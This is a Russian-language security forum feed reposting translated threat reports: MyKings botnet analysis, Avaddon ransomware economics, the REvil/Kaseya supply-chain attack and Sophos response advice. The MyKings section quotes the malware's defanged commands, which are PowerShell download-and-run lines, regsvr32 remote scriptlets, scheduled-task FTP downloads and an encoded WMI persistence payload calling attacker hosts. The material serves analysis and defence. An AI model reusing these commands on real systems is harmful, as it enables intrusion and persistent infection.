   Ботнет MyKings имеет широкую ряд автоматизированных методов взлома серверы - все для установки майнера криптовалюты.

Вступление

Ботнет MyKings / DarkCloud / Smominru (который мы будем называть MyKings) был активен в течение двух лет. Хотя отдельные модули были описаны в нескольких публикациях, в прошлом эта статья не фокусировалась на глубоком анализе отдельных используемых вредоносных компонентов. во время активности. Здесь мы смотрим на взаимодействие между различными элементами инструментов, используемыми злоумышленников MyKings и их роли в процессе заражения, чтобы получить полную картину работа ботнета. Ботнет обычно доставляет криптомайнеры и трояны удаленного доступа (RAT). Недавно злоумышленники, стоящие за MyKings, добавили функциональность буткита, чтобы избежать обнаружения и установить постоянство это трудно удалить или смягчить. Самая ранняя активность MyKings датируется 2016 годом, и с тех пор она активна, но мы обнаружили некоторые пересекаются в образцах и серверной инфраструктуре с более ранней кампанией.

Основные выводы этого исследования заключаются в следующем:

* Ботнет распространяется путем атаки на слабые комбинации имени пользователя и пароля в MySQL, MSSQL, telnet, ssh, IPC, WMI, RDP, а также дополнительно использует EternalBlue для бокового движения.

* Во время начальных процессов заражения ботнет защищает компьютер; удаляет процессы, файлы и настройки, принадлежащие семействам вредоносных программ, управляемые другими угрозами актеры; и закрывает коммуникационные порты, которые могут быть использованы для повторного заражения компьютера.

Злоумышленники, стоящие за этим ботнетом, предпочитают использовать открытый исходный код или другое доступное ПО и обладают достаточными навыками, чтобы вносить изменения и улучшения в исходный код.

Основными целями ботнета являются страны Азии, но мы можем найти инфекции повсюду.

В число наиболее инфицированных стран входили:

* Китай * Тайвань * Россия * Бразилия * США * Индия * Япония

Процесс заражения

Компоненты ботнета очень взаимосвязаны, и существует множество возможных путей или способв заражений.

ok.exe - установщик буткита Ботнет MyKings начал интенсивно использовать компоненты буткита в начале 2019 года. Однако первые версии установщика буткита датируются июнем 2018 г.

Наиболее распространенный вариант попадал в зараженные системы с именами файлов ok.exe или max.exe.

Установщики буткитов обычно защищены с помощью VMProtect, что делает более сложным точный анализ.

Это характерно для ботнета: есть несколько компонентов, каждый из которых они делают очень похожую процедуру самообновления. Таким образом, даже если большинство компонентов ботнет удаляется с компьютера, остальные имеют возможность восстановить его до полной силы.

Он выполняет поиск в списке запущенных процессов и завершает те, которые связаны с продуктами безопасности, используя жестко запрограммированный список имен.

c3.bat - это компонент, который завершает процесс заражения. Это относительно большой командный файл; В размер варьируется, но обычно он составляет от 3 000 до 20 000 байт. Он запускает несколько десятков процессов по мере выполнения своей задачи - загрузки обновлений, установки. компоненты, устанавливая стойкость и очищая все следы, которые были созданы во время начальный процесс заражения. Это наиболее часто используемый компонент кампаний, было несколько десятков его вариантов. обнаружено, что они отличались в незначительных деталях, таких как список уничтожения или имена учетных записей пользователей. Обычно он устанавливается из самораспаковывающихся архивов RAR, содержащих два файла, n.vbs и c3.bat.

Криптомайнинг - ресурсоемкий процесс, на компьютере есть место только для одного. MyKings пытается убедиться, что ему не нужно делить драгоценный процессор с другими майнерами - даже если они дружеские. Многие имена процессов используются более старыми версиями ботнета MyKings, поэтому этот механизм также может служить частью процесса обновления. Обратите внимание, что более старые версии майнеров, вероятно, использовали более старые (и уже заблокированы) идентификаторы кошельков, которые бесполезны. Список убитых процессов со временем менялся

Некоторые имена используются чаще, другие могут быть связаны с конкретными угрозами, например:


====quote====
   doc001.exe (майнер XMRig)
   docv8.exe (майнер XMRig)
   wodCmdTerm.exe (майнер XMRig)
   NsCpuCNMiner64.exe (CNMiner)
   tlscntr.exe (майнер XMRig)
   ctfmonc.exe (майнер XMRig)
   wuauser.exe (майнер XMRig)
   mscsuscr.exe (майнер XMRig)
   Pviunc.exe (майнер XMRig)
   Bllianc.exe (майнер XMRig)
   dether.exe (майнер XMRig)

=============

Правила межсетевого экрана

Пакетный файл изменяет правила брандмауэра. Цель состоит в том, чтобы закрыть порты, которые использовались для первоначального инфекции или могут быть использованы для последующих инфекций. Таким образом ботнет защищает себя от враждебных захват, обезопасив зараженный компьютер. Он создает новые правила брандмауэра, которые блокируют доступ к зараженному компьютеру на портах 135, 137, 138, 139 и 445 (относится к таким службам, как RPC, NetBIOS и Active Directory). Это закрывает возможность повторное заражение с помощью эксплойта RDP или EternalBlue.

Обновление компонентов

Скрипт скачивает с сайтов обновлений ряд различных скриптов, например:


====quote====
   powershell.exe IEX (New-Object
   system.Net.WebClient).DownloadString('hxxp://wmi.1217bye[.]host/S.ps1')&powershell.exe IEX
   (New-Object
   system.Net.WebClient).DownloadString('hxxp://173.208.139[.]170/s.txt')&powershell.exe IEX
   (New-Object system.Net.WebClient).DownloadString('hxxp://35.182.171[.]137/s.jpg')||regsvr32 /u
   /s /i:hxxp://wmi.1217bye[.]host/1.txt scrobj.dll®svr32 /u /s
   /i:hxxp://173.208.139[.]170/2.txt scrobj.dll®svr32 /u /s /i:hxxp://35.182.171[.]137/3.txt
   scrobj.dll"
=============

Роль загружаемых файлов следующая:
• s.ps1: завершает все процессы svchost.exe и conhost.exe, которые не выполняются из системный каталог и выполняет c: \ windows \ temp \ conhost.exe
• s.txt: скрипт сбора информации
• s.jpg: убивает процессы, связанные с майнером, и определяет правила брандмауэра.
• 1.txt: загружает компоненты PE (обычно установщик буткита и дроппер c3.bat).
• 2.txt: список URL-адресов для компонентов.

Загружается несколько различных компонентов, и используются несколько методов сохранения, чтобы убедиться, что буткит переживает перезагрузку на компьютере

Устойчивость

Пакетный сценарий использует несколько различных методов для достижения устойчивости и выживаемости после загрузки системы

Буткит

Компонент буткита - это первый из методов сохранения. Поскольку в IPL перезаписывается вредоносный код, он будет выполняться при каждой перезагрузке, а также загружает и запускает компоненты ботнета.

Ключи автозапуска в реестре

В дополнение к этому пакетный файл создает ключ автозапуска реестра, который использует regsvr32.exe для извлечения и выполнения обновления, в данном случае v.sct, который представляет собой простой скриптлет, загружающий компоненты Win32.

 
====quote====
 reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "start" /d
   "regsvr32 /u /s /i:hxxp://js.1226bye[.]xyz:280/v.sct scrobj.dll" /f

   reg add "HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\­Run" /v
   "start" /d "regsvr32 /u /s /i:hxxp://js.1226bye[.]xyz:280/v.sct scrobj.dll" /f
=============



Задачи по расписанию

Некоторые компоненты прописаны в отдельную задачу. Названия задач обычно:
ok, Mysa, Mysa1, Mysa2 и Mysa3.

Запланированные задачи выполняются при запуске системы с помощью командной строки, которая подключается к ftp-серверу. и скачивает обновление, в случае задачи Mysa исполняемый файл будет сохранен как a.exe

 
====quote====
 schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.1226bye[.]xyz>s&echo
   test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo
   bye>>s&ftp -s:s&c:\windows\update.exe" /ru "system" /sc onstart /F

   schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.1226bye[.]xyz>p&echo
   test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp
   -s:p" /ru "system" /sc onstart /F

   schtasks /create /tn "Mysa3" /tr "cmd /c echo open ftp.1226bye[.]xyz>ps&echo
   test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo
   bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe" /ru "system" /sc onstart /F
=============

Запланированные задачи обычно загружают дополнительные компоненты через ftp-соединение, в данном конкретном случае. бэкдор Forshare и майнер.

Затем другой набор задач запускает загруженный файл ok.dat, который является файлом DLL Windows, поэтому сценарий выполняет экспорт ServiceMain с параметром aaaa. Этот компонент является бэкдором PCShare.

====quote====

   schtasks / create / tn "Mysa1" / tr "rundll32.exe c: \ windows \ debug \ item.dat, ServiceMain aaaa "/ ru" system "/ sc onstart / F schtasks / create / tn "ok" / tr "rundll32.exe c: \ windows \ debug \ ok.dat, ServiceMain aaaa "/ ru" система "/ sc onstart / F
=============



сценарии WMI

Третий метод использует фильтры WMI для установления исполнения.

c3.bat сначала удаляет следующие сценарии событий WMI, созданные более ранней версией ботнета:


====quote====
  • fuckyoumm2_filter
   • fuckyoumm2_consumer
   • fuckayoumm3
   • fuckayoumm4
   • Windows Events Consumer
   • Windows Events Consumer4
   • Windows Events Filter
=============


Затем регистрирует новый фильтр с именем fuckyoumm4, который выполняется каждые 3 часа (10800 секунд).

 
====quote====
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3",
   EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM
   __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA
   'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\\root\subscription"
   PATH CommandLineEventConsumer CREATE Name="fuckyoumm4",
   CommandLineTemplate="cmd /c powershell.exe -nop -enc
   "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgB­OAGUAdAAuAFcAZQBiA
   EMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAa­QBuAGcAKAAnAGgAdAB0
   AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIA­LgB0AHgAdAAnACkALgB
   0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACc­AfAAlAHsAJABuAD0AJA
   BfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG­8AdwBuAGwAbwBhAGQAR
   gBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9A­A=="&powershell.ex
   e IEX (New-Object
   system.Net.WebClient).DownloadString('hxxp://wmi.1217bye[.]host/S.ps1')&powersh
   ell.exe IEX (New-Object
   system.Net.WebClient).DownloadString('hxxp://173.208.139[.]170/s.txt')&powershe
   ll.exe IEX (New-Object
   system.Net.WebClient).DownloadString('hxxp://35.182.171[.]137/s.jpg')||regsvr32
   /u /s /i:hxxp://wmi.1217bye[.]host/1.txt scrobj.dll®svr32 /u /s
   /i:hxxp://173.208.139[.]170/2.txt scrobj.dll®svr32 /u /s
   /i:hxxp://35.182.171[.]137/3.txt scrobj.dll"&wmic
   /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE
   Filter="__EventFilter.Name="fuckyoumm3"",
   Consumer="CommandLineEventConsumer.Name="fuckyoumm4""

=============

Это код события - зашифрованная команда PowerShell, которая загружает текстовый файл с URL-адреса.

 
====quote====
hxxp: //wmi.1217bye [.] host / 2.txt (URL-адрес может со временем измениться).

   $wc=New-Object
   System.Net.WebClient;$wc.DownloadString('hxxp://wmi.1217bye[.]host/2.txt').trim(
   ) -split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;}

=============
Содержимое этого файла должно содержать список URL-адресов следующего этапа, которые загружаются и выполнен. Пример содержимого файла 2.txt был следующим:

 
====quote====
 hxxp://173.247.239[.]186/ok.exe
   hxxp://173.247.239[.]186/upsupx.exe
   hxxp://173.247.239[.]186/u.exe
=============

Дополнительные три команды в сценарии WMI загружают еще три компонента:

 
====quote====
hxxp://173.208.139[.]170/s.txt
   hxxp://35.182.171[.]137/s.jpg
   hxxp://wmi.1217bye[.]host/S.ps1
=============

Здесь s.txt - это сценарий PowerShell, который загружает файл списка уничтожения из hxxp: //139.5.177 [.] 19 / l.txt.

Этот файл содержит список имен процессов; сценарий останавливает каждый процесс в этом списке:

 
====quote====
 lsmose.exe,C:\Windows\debug\lsmose.exe,1
   lsmos.exe,C:\Windows\debug\lsmos.exe,1
   lsmo.exe,C:\Windows\debug\lsmo.exe,1
   csrw.exe,C:\Program Files (x86)\Common Files\csrw.exe,119
   csrw.exe,C:\Program Files\Common Files\csrw.exe,1
   lsmosee.exe,c:\windows\help\lsmosee.exe,1
   csrs.exe,c:\csrs.exe,1
=============


В завершение c3.bat загружает и выполняет s.txt. Это извлекает список уничтожения и останавливает процессы указанный в нем, а также дополнительно загружает и выполняет сценарий с именем up.txt. Это сценарий сбора информации, который собирает системную информацию (включая пароли, использующие Powerkatz) и загружает его на ftp-сервер 192.187.111.66, который был активным сервером сбора. на момент написания этого документа.

полный отчет здесь
21.08.2021 13:32:22, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic16539/message113002/ http://forum.esetnod32.ru/messages/forum9/topic16539/message113002/ Sat, 21 Aug 2021 13:32:22 +0300 Полезная информация Расцвет и упадок многомиллионной бизнес-империи программ-вымогателей Расцвет и упадок многомиллионной бизнес-империи программ-вымогателей в форуме Полезная информация.
Резюме:

11 июня 2021 года программа-вымогатель Avaddon, ответственная за многочисленные киберинциденты с 2020 года, приняла решение не только приостановить свои операции, но и предоставить ключи дешифрования всем жертвам, которые стали их целью.

Компания AdvIntel смогла добиться прозрачности виктимологии Avaddon, получив информацию об их мастер-ключе. Такая видимость всех жертв группы (а не только компаний, данные которых были официально размещены в блоге позора Аваддона) позволила получить уникальное представление о шаблонах, стратегиях и методах Авадона.

В ходе расследования виктимологии компания AdvIntel установила, что общий доход, полученный одним оператором за год деятельности Avaddon, потенциально может равняться 1 000 медианной заработной платы в России, что объясняет основу выкупа и то, почему она привлекает все больше и больше талантливых людей в разных странах.

Согласно выводам AdvIntel, полученным в результате исчерпывающих расследований сообщества злоумышленников, гибель Avaddon, вероятно, была вызвана политическими причинами - резкой реакцией администрации президента США на недавние атаки программ-вымогателей и последующим давлением со стороны российских правоохранительных органов.

Введение - Затерянная Империя

Трехбуквенный еврейский корень «авад» (אבד), от которого произошло имя Аваддон, имеет два основных семантических толкования - «разрушать» и «терять / теряться». Действительно, эти два значения идеально определяют программу-вымогатель Avaddon - разрушительную и вредоносную силу, которой всегда удавалось скрыться и исчезнуть.

Сегодня мы проливаем свет на эту затерянную и скрытую преступную империю, используя уникальные наборы данных - полный список жертв Avaddon, когда-либо подвергавшихся нападениям группы за год ее существования, - обнаруженных AdvIntel. Эти уникальные данные SIGINT подтверждаются эксклюзивными выводами HUMINT - заявлениями, сделанными лидерами подпольного киберсообщества Восточной Европы, которые работали с Avaddon, - объясняя и интерпретируя быстрый рост и еще более быстрое падение групп.

11 июня 2021 года Avaddon выпустила ключи для более чем 2000 жертв, содержащие точные имена компаний-нарушителей.

Наш анализ подтвержденной виктимологии показывает, что некоторые из них были ведущими мировыми компаниями. Как этой группе удалось за год поразить такое количество компаний? Ответ: Avaddon создал вокруг себя целую экосистему - сеть цепочек поставок, международных филиалов, продавцов, менеджеров подпольных аукционов и переговорщиков. Они создали органическую экосистему экономики криминального вымогательства - форму «выкупа».

Конечно, Avaddon была не единственной группой, придерживавшейся диверсифицированного подхода к построению более крупной бизнес-системы. Однако, вероятно, они были самыми креативными. Они были единственной группой, которая позволяла международным партнерам присоединяться к команде в качестве аффилированных лиц, которые непосредственно освещали атаки Avaddon на пяти континентах, но способствовали их продвижению.

Одна из крупнейших атак Avaddon - на крупное финансовое учреждение, произошедшая в мае 2021 года - иллюстрирует этот комплексный подход к построению экономики атак с использованием программ-вымогателей.

Операции Avaddon ориентированы на компании и правительства по всему миру, за исключением России.

   
====quote====
Во время исследования атаки мы обнаружили 141 уникальный индикатор компрометации RDP для домена жертвы. Это означает, что Avaddon использовал услуги группы перебора RDP... Другими словами, до того, как Avaddon выполнил операцию по краже данных, они могли использовать весь объем подпольных сервисов и приобрести полный набор - доступ по протоколу RDP, прямой доступ к сети и вредоносное ПО для кражи данных.
=============

Виктимология - ключ к пониманию противника

Этот новаторский подход позволил Avaddon выполнить несколько тысяч атак.

Традиционно при профилировании виктимологии группы компании полагаются на общедоступные данные, то есть на веб-сайты с программами-вымогателями. И действительно, даже глядя на эти частичные данные, которые включают только компании, информация о которых была сброшена в блоги, мы можем увидеть, что Avaddon сыграл важную роль в ландшафте угроз.

Пользователь добавил изображение

Однако жертвы, имена которых были опубликованы в блоге позора, - это только верхушка айсберга. Расширенный набор данных AdvIntel, охватывающий всех жертв Avaddon, обеспечивает дополнительную прозрачность операций.

Для этого статистического исследования компания AdvIntel выбрала специальный набор данных для ценных целей. Во-первых, мы определили отрасли, которые были основными целями группы - производство, розничная торговля, технологии и машиностроение, которые, скорее всего, являются наиболее предпочтительными секторами, потому что для компаний в этих секторах даже кратковременный перерыв в работе может повлечь за собой фатальные последствия.

На следующем этапе мы провели исследование рынка доходов жертв, чтобы определить потенциальную схему атак Avaddon.

Общий доход всех жертв составил около 35 миллиардов долларов. Это число, по сути, сегмент рынка, которому так или иначе угрожают вредоносные операции Avaddon.

Жертв Аваддона можно разделить на три категории: маленькие, средние и большие.

Средний доход жертвы составил:

13 миллионов долларов США для малого бизнеса
287 миллионов долларов для жертв среднего размера
3,7 миллиарда долларов США для крупного бизнеса

Ransonomics: прибыль от программ-вымогателей Avaddon

Наша следующая цель исследования состояла в том, чтобы подсчитать, сколько денег может заработать группа Avaddon до своего быстрого выхода на пенсию. Мы использовали наши предыдущие знания, полученные в результате взаимодействия с злоумышленниками, для разработки реалистичных формул расчета требований выкупа, подкрепленных реальными делами Avaddon.

После определения дохода они исследуют сектор, в котором работает жертва. Наиболее распространенным расчетом, который, согласно нашим конфиденциальным и достоверным источникам информации, используемым Avaddon, был так называемое правило «5x5», когда 5% годового дохода используется для начала переговоров, а годовой доход оценивается в одну пятую от общий доход. Другими словами, для жертвы, чей общий доход составляет 7 миллионов долларов США, начальная цена выкупа будет составлять 70 000 долларов США. Как правило, Avaddon снижал цену во время торга, и конечный выкуп составлял около 50 000 долларов США за успешную операцию.

Однако не все компании из двухтысячного списка жертв были вынуждены заплатить такой выкуп. Во многих случаях переговоры заканчивались неудачей или выкуп был минимальным - несколько тысяч долларов (особенно в самом начале). В то же время более крупные платежи требовали от более крупных организаций. Однако здесь формула «5x5» была заменена более адекватной шкалой для более крупного выкупа, включающей 0,01% годовой прибыли вместо 5% и т. Д. Для многомиллиардной компании спрос ограничивался несколько миллионов долларов.

После завершения всех расчетов с индивидуальным изучением каждой жертвы из набора ценных данных, AdvIntel установил, что основная часть выкупа поступила от более чем тысячи небольших компаний, которые требовали от 30 000 до 70 000 долларов США и составила 55 миллионов долларов, выплаченных компании Avaddon. Более 500 крупных предприятий в списке потерпевших составили еще 30 миллионов долларов, а остальная часть была поделена между более мелкими выплатами. Таким образом, наша общая оценка дохода Avaddon составляет приблизительно 87 миллионов долларов США.

Наша команда также попыталась рассчитать доход основного члена команды Avaddon на основе этих чисел. В рамках Avaddon RaaS более 70% дохода шло филиалам, поэтому основная команда, и особенно лидер Avaddon, получила около 26 миллионов долларов США. Это число, вероятно, было разделено по крайней мере между четырьмя людьми, которые получили приблизительный годовой доход (Avaddon существовал в течение года) 7 000 000 долларов США. Для сравнения - средний годовой доход в России оценивается в 7000 долларов.


====quote====
   Другими словами, за год разработки программ-вымогателей член Avaddon заработал столько же денег, сколько средний россиянин за тысячелетие
=============

Крушение Аваддона - Черная метка киберпиратов

Если Avaddon был таким успешным, что могло побудить их бросить курить? Вероятный ответ - страх. Правоохранительные органы США и администрация Байдена были очень откровенны в отношении будущих ответных мер против программ-вымогателей и новой точки зрения, в которой вымогатели рассматриваются как, по сути, террористический акт. Этот новый подход к цифровому вымогательству со стороны ведущей мировой сверхдержавы вызвал прямой отклик в подпольном сообществе - вышеупомянутая вымогательство - тщательно и скрупулезно выстроенная сеть альянсов и цепочек поставок - начала быстро терпеть неудачу.

Программные брокеры отказались продавать вредоносное ПО группам вымогателей, форумы запретили партнерство RaaS, а филиалы остались без средств и услуг для распространения полезной нагрузки. Мир киберпреступности всегда был похож на пиратство, и у него есть собственная «черная метка» - смертельный знак стигмы - после Colonial Pipeline программы-вымогатели получили этот знак на себе. Avaddon, находившийся в центре динамичной и бурной экосистемы программ-вымогателей, быстро осознал риски, с которыми они могут столкнуться.

Когда политика встречает киберпреступность

Это осознание, вероятно, было вызвано недавним вмешательством политики в сферу киберпреступности. В целом внутренняя логика российского ландшафта безопасности предполагает, что успешная кибер-группа в какой-то момент станет достаточно заметной, чтобы привлечь внимание государства. Обычно правоохранительные органы закрывают глаза на кибероперации, если только эти операции не нацелены на российских граждан или бизнес. Однако в мае 2021 года этот статус-кво изменился.

   
====quote====
После того, как администратор крупнейшего форума XSS призвал к запрету программ-вымогателей, оправдывая это политическими причинами, сообщество цифровых вымогателей в России, как было замечено, прошло стадии паранойи. Это было подтверждено только многочисленными заявлениями, сделанными за последние три месяца правительством России, Министерством иностранных дел России и лично президентом Путиным о создании международной российско-американской инициативы по созданию совместного ландшафта кибербезопасности. Российские официальные лица, вероятно, видят в этом инструмент деэскалации американо-российских отношений, особенно в свете предстоящего саммита Байдена и Путина, намеченного на 16 июня 2021 года.

=============

Также примечательно, что некоторые из юрисдикций, на которые нацелен Аваддон, - Иран, Китай и Турция, имеют прочные геополитические связи с Россией и действуют как российские союзники или важные экономические партнеры. Однако неясно, могло ли это привести к обострению отношений между Аваддоном и российским государством.

Какими бы ни были истинные доводы российских политиков, призывающих к международному сотрудничеству в области кибербезопасности, эти недавние заявления явно оказали влияние на подпольное сообщество киберпреступников. AdvIntel отслеживает многочисленные обсуждения между высокопоставленными участниками, работающими с Avaddon, которые упомянули, что одно из аффилированных лиц группы было задержано российскими правоохранительными органами накануне американо-российского саммита и что могут последовать дальнейшие аресты лидеров программ-вымогателей с целью обезопасить политический ландшафт.

Avaddon Decryption Tool
https://www.emsisoft.com/ransomware-decryption-tools/avaddon

https://www.advanced-intel.com/post/the-rise-demise-of-multi-million-ransomware-business-empire
20.07.2021 16:46:25, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic16490/message112744/ http://forum.esetnod32.ru/messages/forum9/topic16490/message112744/ Tue, 20 Jul 2021 16:46:25 +0300 Полезная информация REvil Ransomware поразил 200 компаний в результате атаки на цепочку поставок MSP REvil Ransomware поразил 200 компаний в результате атаки на цепочку поставок MSP в форуме Полезная информация.
Массовая атака REvil затрагивает нескольких поставщиков управляемых услуг и их клиентов через атаку цепочки поставок Kaseya, о которой сообщается.

Начиная с полудня июля, REvil, также известная как Sodinokibi, нацелена на MSP с тысячами клиентов с помощью атаки на цепочку поставок Kaseya VSA.

В настоящее время существует восемь известных крупных поставщиков услуг мобильной связи, которые пострадали в результате этой атаки на цепочку поставок.

Kaseya VSA - это облачная платформа MSP, которая позволяет поставщикам выполнять управление исправлениями и мониторинг клиентов для своих клиентов.

Атака REvil распространяется через автообновление

Как сообщили BleepingComputer атаки на MSP, по всей видимости, являются атакой на цепочку поставок через Kaseya VSA.

В результате обновления, Kaseya VSA поместит файл agent.crt в папку c: \ kworking, которая распространяется как обновление под названием «Kaseya VSA Agent Hot-fix».

Затем запускается команда PowerShell для декодирования файла agent.crt с помощью допустимой команды Windows certutil.exe и извлечения файла agent.exe в ту же папку.

Пользователь добавил изображение

Agent.exe подписан с использованием сертификата от «PB03 TRANSPORT LTD» и включает встроенные файлы «MsMpEng.exe» и «mpsvc.dll», при этом DLL является шифровальщиком REvil.

MsMPEng.exe - это более старая версия законного исполняемого файла Microsoft Defender, используемого в качестве LOLBin для запуска DLL и шифрования устройства с помощью доверенного исполняемого файла.

Некоторые образцы добавляют ключи реестра Windows и изменения конфигурации зараженных компьютеров.

Например, образец [VirusTotal], установленный BleepingComputer, добавляет ключ HKLM \ SOFTWARE \ Wow6432Node \ BlackLivesMatter для хранения информации о конфигурации атаки.

Специалист Intel Виталий Кремез сообщил BleepingComputer, что другой образец настраивает устройство для запуска REvil Safe Mode с паролем по умолчанию «DTrump4ever».

   [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
   "AutoAdminLogon"="1"
   "DefaultUserName"="[account_name]"
   "DefaultPassword"="DTrump4ever"

Fabian Wosar выпустил расшифрованную копию конфигурации шифратора REvil / Sodin. Этот файл содержит подробную информацию о полезной нагрузке программы-вымогателя, включая списки уничтоженных процессов, компоненты из белого списка и используемые домены управления и контроля.

IOC (SHA256):

agent.exe d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e­9f1e

mpsvc.dll (загруженная DLL) e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a546­6ea2

mpsvc.dll (загруженная DLL) 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae7­59dd

MSP - важная цель для кибергрупп, поскольку они предлагают простой канал для заражения многих компаний посредством единственного взлома, однако атаки требуют глубоких знаний о MSP и используемом ими программном обеспечении.

REvil имеет аффилированное лицо, хорошо разбирающееся в технологиях, используемых MSP, поскольку у них есть долгая история нацеливания на эти компании и программное обеспечение, обычно используемое ими.

В июне 2019 года филиал REvil нацелился на MSP через удаленный рабочий стол, а затем использовал их программное обеспечение для управления, чтобы отправить установщиков программ-вымогателей на все конечные точки, которыми они управляют.

https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-200-companies-in-msp-supply-chain-attack/
https://app.any.run/tasks/d02a2a64-750a-47fb-a310-178d1f7276a1#
https://www.bleepingcomputer.com/news/security/kaseya-was-fixing-zero-day-just-as-revil-ransomware-sprung-their-attack/
https://www.bleepingcomputer.com/news/security/revil-ransomware-asks-70-million-to-decrypt-all-kaseya-attack-victims/
https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
09.07.2021 09:52:55, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic16479/message112706/ http://forum.esetnod32.ru/messages/forum9/topic16479/message112706/ Fri, 09 Jul 2021 09:52:55 +0300 Полезная информация Если у вас, если у вас.. если вас атакует Avaddon Ransomware Если у вас, если у вас.. если вас атакует Avaddon Ransomware в форуме Полезная информация.
Программа-вымогатель Avaddon - это программа-вымогатель как услуга (RaaS), сочетающая шифрование с кражей данных и вымогательством. Avaddon существует с 2019 года, но с июня 2020 года он стал более заметным и агрессивным. «Аффилированные лица» или клиенты службы наблюдали развертывание Avaddon для широкого круга целей во многих странах, часто посредством злонамеренного спама и фишинговых кампаний с импользованием JavaScript.

Организации, пораженные программой-вымогателем Avaddon, сталкиваются не только с шифрованием данных - существует также угроза раскрытия общедоступных данных на сайте утечки Avaddon и, в последнее время, риск распределенных атак типа «отказ в обслуживании» (DDoS), нарушающих работу. Эта тактика призвана усилить давление на жертв с требованием выкупа.

Что делать немедленно: сдержать и обезвредить

Первое, что вам нужно сделать, это определить, продолжается ли атака. Если вы подозреваете, что это так, и у вас нет инструментов, чтобы остановить это, определите, какие устройства были затронуты, и немедленно изолируйте их. Самый простой вариант - просто отсоединить сетевой кабель или выключить адаптер Wi-Fi. Если повреждение более масштабное, чем повреждение нескольких устройств, подумайте о том, чтобы сделать это на уровне коммутатора и отключить в автономном режиме целые сегменты сети, а не отдельные устройства. Выключайте устройства только в том случае, если не можете отключить сеть.

Во-вторых, нужно оценить ущерб. Какие конечные точки, серверы и операционные системы были затронуты, что было потеряно? Ваши резервные копии остались нетронутыми или злоумышленник удалил их? Если они целы, немедленно сделайте автономную копию. Кроме того, какие машины были защищены?

В-третьих, есть ли у вас комплексный план реагирования на инциденты? Если нет, вам необходимо определить, кто должен быть вовлечен в работу с этим инцидентом. Потребуются ИТ-администраторы и высшее руководство, но вам также может потребоваться привлечь внешних экспертов по безопасности, проконсультироваться с киберстраховщиком и юрисконсультом. Следует ли вам сообщать об инциденте в правоохранительные органы и / или информировать органы по защите данных? Также возникает вопрос о том, какую информацию следует предоставлять пользователям и клиентам, многие из которых, вероятно, придут на работу и столкнутся с аналогичной запиской о выкупе на своем рабочем столе.

И последнее, но не менее важное: вы хотите поговорить с людьми о том, что происходит, но злоумышленники могут подслушивать, поэтому не используйте обычные каналы связи. Например, если злоумышленники находятся в вашей сети какое-то время, у них, вероятно, будет доступ к электронной почте.

Что делать дальше: исследовать

После того, как вам удалось сдержать и нейтрализовать атаку, найдите время, чтобы исследовать, что произошло, чтобы снизить вероятность ее повторения. Если вы не уверены в том, что делаете это самостоятельно, поставщики средств безопасности, в том числе Sophos, круглосуточно предлагают помощь специалистов по реагированию на инциденты и поиску угроз.

По словам команды Sophos Rapid Response, это то, чего вам следует ожидать от активности вымогателя Avaddon в вашей сети:

1. Скорее всего, злоумышленники были в вашей сети несколько дней или даже недель. Avaddon - это программа-вымогатель как услуга, включающая кражу данных. Он управляется человеческими аффилированными лицами, которые получают долю от выкупа. Партнерам нужно время, чтобы изучить сеть цели, чтобы найти и украсть ценные данные и обеспечить максимальное нарушение работы, поскольку это позволяет им взимать более высокие выкуп.

Лица, отвечающие за реагирование на инциденты Sophos, наблюдали время ожидания злоумышленников от 10 до 28 дней в атаках, связанных с выпуском программы-вымогателя Avaddon.

2. Злоумышленники могут использовать множество различных методов для взлома вашей сети. Известные методы начального доступа для программ-вымогателей Avaddon включают, помимо прочего, спам-кампании, доставляющие вредоносные файлы JavaScript, открытые службы RDP (протокол удаленного рабочего стола) и уязвимые виртуальные частные сети (VPN). Такие сайты, как Shodan.io, дают представление о том, что может сделать злоумышленник. узнать о своей сети; попробуйте использовать его для поиска ваших внешних IP-адресов.

Злоумышленники Avaddon нацелены на системы как Windows, так и Linux.

3. У них будет защищенный доступ к учетным записям администраторов домена, а также к другим учетным записям пользователей. Злоумышленники обычно взламывают несколько учетных записей во время атаки. Их основная цель - получить доступ к учетным записям администраторов домена, которые они могут использовать для запуска вымогателей. Однако они также нацелены на определенные учетные записи администраторов, которые имеют доступ к конфиденциальным данным, системам резервного копирования и консолям управления безопасностью.

